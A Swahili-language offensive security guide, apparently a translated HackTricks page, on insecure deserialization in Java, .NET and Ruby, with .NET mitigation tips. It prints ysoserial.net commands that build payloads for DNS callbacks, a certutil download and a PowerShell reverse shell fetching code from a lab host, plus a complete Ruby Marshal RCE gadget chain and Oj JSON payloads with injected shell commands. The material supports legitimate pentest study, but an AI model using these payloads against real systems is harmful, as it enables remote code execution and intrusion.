- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
- https://www.youtube.com/watch?v=VviY3O-euVQ
- Mazungumzo kuhusu gadgetinspector: https://www.youtube.com/watch?v=wPbW6zQ52w8 na slaidi: https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf
- Karatasi ya Marshalsec: https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true
- https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr
- https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
- https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
- Java na .Net JSON deserialization karatasi: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf, mazungumzo: https://www.youtube.com/watch?v=oUAeWhW5b8c na slaidi: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
- CVEs za deserialization: https://paper.seebug.org/123/
JNDI Injection & log4Shell
Pata kile ambacho ni JNDI Injection, jinsi ya kulitumia kupitia RMI, CORBA & LDAP na jinsi ya kutumia log4shell (na mfano wa vuln hii) katika ukurasa ufuatao:
{{#ref}} jndi-java-naming-and-directory-interface-and-log4shell.md {{#endref}}
JMS - Java Message Service
API ya Java Message Service (JMS) ni API ya Java inayolenga ujumbe kwa ajili ya kutuma ujumbe kati ya wateja wawili au zaidi. Ni utekelezaji wa kushughulikia tatizo la mtengenezaji-mtumiaji. JMS ni sehemu ya Java Platform, Enterprise Edition (Java EE), na ilifafanuliwa na spesifikesheni iliyotengenezwa katika Sun Microsystems, lakini ambayo tangu wakati huo imeongozwa na Java Community Process. Ni kiwango cha ujumbe kinachoruhusu vipengele vya programu vinavyotegemea Java EE kuunda, kutuma, kupokea, na kusoma ujumbe. Inaruhusu mawasiliano kati ya vipengele tofauti vya programu iliyosambazwa kuwa na uhusiano wa kulegea, wa kuaminika, na wa asynchronic. (Kutoka Wikipedia).
Bidhaa
Kuna bidhaa kadhaa zinazotumia middleware hii kutuma ujumbe:
.png)
.png)
Utekelezaji
Hivyo, kimsingi kuna huduma nyingi zinazotumia JMS kwa njia hatari. Kwa hivyo, ikiwa una privileges za kutosha kutuma ujumbe kwa huduma hizi (kawaida utahitaji akreditif za halali) unaweza kuwa na uwezo wa kutuma vitu vya hatari vilivyohifadhiwa ambavyo vitatafsiriwa na mtumiaji/mwandikaji.
Hii inamaanisha kwamba katika utekelezaji huu wateja wote watakaotumia ujumbe huo wataambukizwa.
Unapaswa kukumbuka kwamba hata kama huduma ina udhaifu (kwa sababu inatafsiri kwa usalama usio salama pembejeo za mtumiaji) bado unahitaji kutafuta gadgets halali ili kutumia udhaifu huo.
Zana JMET ilitengenezwa ili kuunganisha na kushambulia huduma hizi kwa kutuma vitu kadhaa vya hatari vilivyohifadhiwa kwa kutumia gadgets zinazojulikana. Hizi exploit zitaweza kufanya kazi ikiwa huduma bado ina udhaifu na ikiwa yoyote ya gadgets zilizotumika iko ndani ya programu iliyo hatarini.
Marejeleo
- Mazungumzo ya JMET: https://www.youtube.com/watch?v=0h8DWiOWGGA
- Slaidi: https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf
.Net
Katika muktadha wa .Net, exploit za deserialization zinafanya kazi kwa njia inayofanana na zile zinazopatikana katika Java, ambapo gadgets zinatumika kutekeleza msimbo maalum wakati wa deserialization ya kitu.
Alama
WhiteBox
Msimbo wa chanzo unapaswa kuchunguzwa kwa matukio ya:
TypeNameHandlingJavaScriptTypeResolver
Kipaumbele kinapaswa kuwa kwa serializers zinazoruhusu aina kuamuliwa na variable chini ya udhibiti wa mtumiaji.
BlackBox
Utafutaji unapaswa kulenga mfuatano wa string iliyokodishwa kwa Base64 AAEAAAD///// au muundo wowote wa kufanana ambao unaweza kupitia deserialization upande wa seva, ukitoa udhibiti juu ya aina itakayokuwa ikitafsiriwa. Hii inaweza kujumuisha, lakini si tu, muundo wa JSON au XML unaoonyesha TypeObject au $type.
ysoserial.net
Katika kesi hii unaweza kutumia zana ysoserial.net ili kuunda exploit za deserialization. Mara tu unaposhusha hifadhi ya git unapaswa kuunda zana kwa kutumia Visual Studio kwa mfano.
Ikiwa unataka kujifunza kuhusu jinsi ysoserial.net inavyounda exploit zake unaweza kuangalia ukurasa huu ambapo inafafanuliwa gadget ya ObjectDataProvider + ExpandedWrapper + Json.Net formatter.
Chaguzi kuu za ysoserial.net ni: --gadget, --formatter, --output na --plugin.
--gadgetinatumika kuashiria gadget ya kutumia (onyesha darasa/funzo ambalo litakabiliwa wakati wa deserialization ili kutekeleza amri).--formatter, inatumika kuashiria njia ya kuhifadhi exploit (unahitaji kujua ni maktaba gani inayotumika kwenye back-end kutafsiri payload na utumie ile ile kuihifadhi)--outputinatumika kuashiria ikiwa unataka exploit katika raw au base64 iliyokodishwa. Kumbuka kwamba ysoserial.net itakuwa inakodisha payload kwa kutumia UTF-16LE (encoding inayotumika kwa chaguo-msingi kwenye Windows) hivyo ikiwa unapata raw na unakodisha tu kutoka kwenye console ya linux unaweza kuwa na baadhi ya matatizo ya ulinganifu wa encoding ambayo yatakwamisha exploit kufanya kazi ipasavyo (katika sanduku la HTB JSON payload ilifanya kazi katika UTF-16LE na ASCII lakini hii haimaanishi itafanya kazi kila wakati).--pluginysoserial.net inasaidia plugins kutengeneza exploits kwa mifumo maalum kama ViewState
Zaidi ya vigezo vya ysoserial.net
--minifyitatoa payload ndogo (ikiwa inawezekana)--raf -f Json.Net -c "chochote"Hii itaonyesha gadgets zote zinazoweza kutumika na formatter iliyotolewa (Json.Netkatika kesi hii)--sf xmlunaweza kuonyesha gadget (-g) na ysoserial.net itatafuta formatters zinazojumuisha "xml" (bila kujali herufi kubwa au ndogo)
Mifano ya ysoserial kuunda exploits:
#Send ping
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 10.10.14.44" -o base64
#Timing
#I tried using ping and timeout but there wasn't any difference in the response timing from the web server
#DNS/HTTP request
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "nslookup sb7jkgm6onw1ymw0867mzm2r0i68ux.burpcollaborator.net" -o base64
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "certutil -urlcache -split -f http://rfaqfsze4tl7hhkt5jtp53a1fsli97.burpcollaborator.net/a a" -o base64
#Reverse shell
#Create shell command in linux
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.ps1')" | iconv -t UTF-16LE | base64 -w0
#Create exploit using the created B64 shellcode
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA=" -o base64
ysoserial.net pia ina kipengele cha kuvutia sana ambacho husaidia kuelewa vizuri jinsi kila exploit inavyofanya kazi: --test
Ikiwa utaashiria kipengele hiki ysoserial.net itajaribu exploit kwa ndani, hivyo unaweza kujaribu kama payload yako itafanya kazi ipasavyo.
Kipengele hiki ni muhimu kwa sababu ukikagua msimbo utapata vipande vya msimbo kama ifuatavyo (kutoka ObjectDataProviderGenerator.cs):
if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
Hii inamaanisha kwamba ili kujaribu exploit, msimbo utaita serializersHelper.JsonNet_deserialize
public static object JsonNet_deserialize(string str)
{
Object obj = JsonConvert.DeserializeObject<Object>(str, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
return obj;
}
Katika msimbo wa awali unahatarisha kwa shambulio lililotengenezwa. Hivyo basi, ikiwa unapata kitu kinachofanana katika programu ya .Net, inamaanisha kwamba labda programu hiyo pia inahatarishwa.
Kwa hiyo, --test parameter inatupa uwezo wa kuelewa ni sehemu zipi za msimbo zinahatarishwa na shambulio la deserialization ambalo ysoserial.net linaweza kutengeneza.
ViewState
Angalia hii POST kuhusu jinsi ya kujaribu kuhamasisha parameter ya __ViewState ya .Net ili kutekeleza msimbo wowote. Ikiwa tayari unajua siri zinazotumiwa na mashine ya mwathirika, soma hii post kujua jinsi ya kutekeleza msimbo.
Kuzuia
Ili kupunguza hatari zinazohusiana na deserialization katika .Net:
- Epuka kuruhusu mitiririko ya data kufafanua aina zao za vitu. Tumia
DataContractSerializerauXmlSerializerinapowezekana. - Kwa
JSON.Net, wekaTypeNameHandlingkuwaNone: %%%TypeNameHandling = TypeNameHandling.None%%% - Epuka kutumia
JavaScriptSerializernaJavaScriptTypeResolver. - Punguza aina ambazo zinaweza kuhamasishwa, ukielewa hatari zilizopo na aina za .Net, kama
System.IO.FileInfo, ambayo inaweza kubadilisha mali za faili za seva, na hivyo kusababisha mashambulizi ya kukatiza huduma. - Kuwa makini na aina zenye mali hatari, kama
System.ComponentModel.DataAnnotations.ValidationExceptionyenye mali yake yaValue, ambayo inaweza kutumiwa vibaya. - Dhibiti kwa usalama uanzishaji wa aina ili kuzuia washambuliaji kuathiri mchakato wa deserialization, na hivyo kufanya hata
DataContractSerializerauXmlSerializerkuwa hatarini. - Tekeleza udhibiti wa orodha nyeupe kwa kutumia
SerializationBindermaalum kwaBinaryFormatternaJSON.Net. - Kuwa na habari kuhusu vifaa vya deserialization visivyo salama vilivyojulikana ndani ya .Net na kuhakikisha deserializers hazianzishi aina kama hizo.
- Tenga msimbo unaoweza kuwa hatari kutoka kwa msimbo wenye ufikiaji wa mtandao ili kuepuka kufichua vifaa vilivyojulikana, kama
System.Windows.Data.ObjectDataProviderkatika programu za WPF, kwa vyanzo vya data visivyoaminika.
Marejeo
- Karatasi ya deserialization ya Java na .Net : https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf,** mazungumzo: https://www.youtube.com/watch?v=oUAeWhW5b8c na slaidi: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
- https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp
- https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
- https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization
Ruby
Katika Ruby, serialization inarahisishwa na mbinu mbili ndani ya maktaba ya marshal. Mbinu ya kwanza, inayojulikana kama dump, inatumika kubadilisha kitu kuwa mtiririko wa byte. Mchakato huu unajulikana kama serialization. Kinyume chake, mbinu ya pili, load, inatumika kurudisha mtiririko wa byte kuwa kitu, mchakato unaojulikana kama deserialization.
Ili kulinda vitu vilivyohifadhiwa, Ruby inatumia HMAC (Hash-Based Message Authentication Code), kuhakikisha uaminifu na ukweli wa data. Funguo inayotumika kwa ajili hii inahifadhiwa katika moja ya maeneo kadhaa yanayowezekana:
config/environment.rbconfig/initializers/secret_token.rbconfig/secrets.yml/proc/self/environ
Ruby 2.X generic deserialization to RCE gadget chain (maelezo zaidi katika https://www.elttam.com/blog/ruby-deserialization/):
#!/usr/bin/env ruby
# Code from https://www.elttam.com/blog/ruby-deserialization/
class Gem::StubSpecification
def initialize; end
end
stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")#RCE cmd must start with "|" and end with "1>&2"
puts "STEP n"
stub_specification.name rescue nil
puts
class Gem::Source::SpecificFile
def initialize; end
end
specific_file = Gem::Source::SpecificFile.new
specific_file.instance_variable_set(:@spec, stub_specification)
other_specific_file = Gem::Source::SpecificFile.new
puts "STEP n-1"
specific_file <=> other_specific_file rescue nil
puts
$dependency_list= Gem::DependencyList.new
$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
puts "STEP n-2"
$dependency_list.each{} rescue nil
puts
class Gem::Requirement
def marshal_dump
[$dependency_list]
end
end
payload = Marshal.dump(Gem::Requirement.new)
puts "STEP n-3"
Marshal.load(payload) rescue nil
puts
puts "VALIDATION (in fresh ruby process):"
IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
pipe.print payload
pipe.close_write
puts pipe.gets
puts
end
puts "Payload (hex):"
puts payload.unpack('H*')[0]
puts
require "base64"
puts "Payload (Base64 encoded):"
puts Base64.encode64(payload)
Mnyororo mwingine wa RCE kutumia Ruby On Rails: https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/
Mbinu ya Ruby .send()
Kama ilivyoelezwa katika ripoti hii ya udhaifu, ikiwa ingizo la mtumiaji lisilo safishwa linafikia mbinu ya .send() ya kitu cha ruby, mbinu hii inaruhusu kuita mbinu nyingine yoyote ya kitu hicho kwa vigezo vyovyote.
Kwa mfano, kuita eval na kisha msimbo wa ruby kama parameter ya pili kutaruhusu kutekeleza msimbo wa kiholela:
<Object>.send('eval', '<user input with Ruby code>') == RCE
Zaidi ya hayo, ikiwa tu parameter moja ya .send() inasimamiwa na mshambuliaji, kama ilivyotajwa katika andiko la awali, inawezekana kuita njia yoyote ya kitu ambacho hakihitaji hoja au ambazo hoja zake zina thamani za default.
Kwa hili, inawezekana kuhesabu njia zote za kitu ili kupata baadhi ya njia za kuvutia zinazokidhi mahitaji hayo.
<Object>.send('<user_input>')
# This code is taken from the original blog post
# <Object> in this case is Repository
## Find methods with those requirements
repo = Repository.find(1) # get first repo
repo_methods = [ # get names of all methods accessible by Repository object
repo.public_methods(),
repo.private_methods(),
repo.protected_methods(),
].flatten()
repo_methods.length() # Initial number of methods => 5542
## Filter by the arguments requirements
candidate_methods = repo_methods.select() do |method_name|
[0, -1].include?(repo.method(method_name).arity())
end
candidate_methods.length() # Final number of methods=> 3595
Ruby class pollution
Angalia jinsi inaweza kuwa inawezekana kuharibu darasa la Ruby na kulitumia hapa.
Ruby _json pollution
Wakati wa kutuma mwili baadhi ya thamani zisizoweza kuhesabiwa kama array zitaongezwa kwenye ufunguo mpya unaoitwa _json. Hata hivyo, inawezekana kwa mshambuliaji pia kuweka katika mwili thamani inayoitwa _json yenye thamani za kiholela anazotaka. Kisha, ikiwa backend kwa mfano inakagua ukweli wa parameter lakini kisha pia inatumia parameter _json kufanya kitendo fulani, inaweza kufanyika kupita idhini.
Angalia maelezo zaidi katika ukurasa wa Ruby _json pollution.
Other libraries
Teknolojia hii ilichukuliwa kutoka kwenye chapisho la blogi hii.
Kuna maktaba nyingine za Ruby ambazo zinaweza kutumika kuunda vitu na hivyo zinaweza kutumika vibaya kupata RCE wakati wa deserialization isiyo salama. Jedwali lifuatalo linaonyesha baadhi ya maktaba hizi na njia wanayoita ya maktaba iliyopakuliwa kila wakati inapotolewa (kazi ya kutumia vibaya kupata RCE kimsingi):
| Library | Input data | Kick-off method inside class |
| Marshal (Ruby) | Binary | _load |
| Oj | JSON | hash (class needs to be put into hash(map) as key) |
| Ox | XML | hash (class needs to be put into hash(map) as key) |
| Psych (Ruby) | YAML | hash (class needs to be put into hash(map) as key)init_with |
| JSON (Ruby) | JSON | json_create ([see notes regarding json_create at end](#table-vulnerable-sinks)) |
Basic example:
# Existing Ruby class inside the code of the app
class SimpleClass
def initialize(cmd)
@cmd = cmd
end
def hash
system(@cmd)
end
end
# Exploit
require 'oj'
simple = SimpleClass.new("open -a calculator") # command for macOS
json_payload = Oj.dump(simple)
puts json_payload
# Sink vulnerable inside the code accepting user input as json_payload
Oj.load(json_payload)
Katika kesi ya kujaribu kutumia Oj, ilikuwapo uwezekano wa kupata darasa la gadget ambalo ndani ya kazi yake ya hash litaita to_s, ambayo itaita spec, ambayo itaita fetch_path ambayo ilikuwapo uwezekano wa kufanya iweze kupata URL ya nasibu, ikitoa detector bora wa aina hizi za udhaifu wa deserialization zisizo na usafi.
{
"^o": "URI::HTTP",
"scheme": "s3",
"host": "example.org/anyurl?",
"port": "anyport",
"path": "/",
"user": "anyuser",
"password": "anypw"
}
Zaidi ya hayo, iligundulika kwamba kwa mbinu ya awali folda pia inaundwa katika mfumo, ambayo ni hitaji la kutumia gadget nyingine ili kubadilisha hii kuwa RCE kamili na kitu kama:
{
"^o": "Gem::Resolver::SpecSpecification",
"spec": {
"^o": "Gem::Resolver::GitSpecification",
"source": {
"^o": "Gem::Source::Git",
"git": "zip",
"reference": "-TmTT=\"$(id>/tmp/anyexec)\"",
"root_dir": "/tmp",
"repository": "anyrepo",
"name": "anyname"
},
"spec": {
"^o": "Gem::Resolver::Specification",
"name": "name",
"dependencies": []
}
}
}
Angalia maelezo zaidi katika post ya asili.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.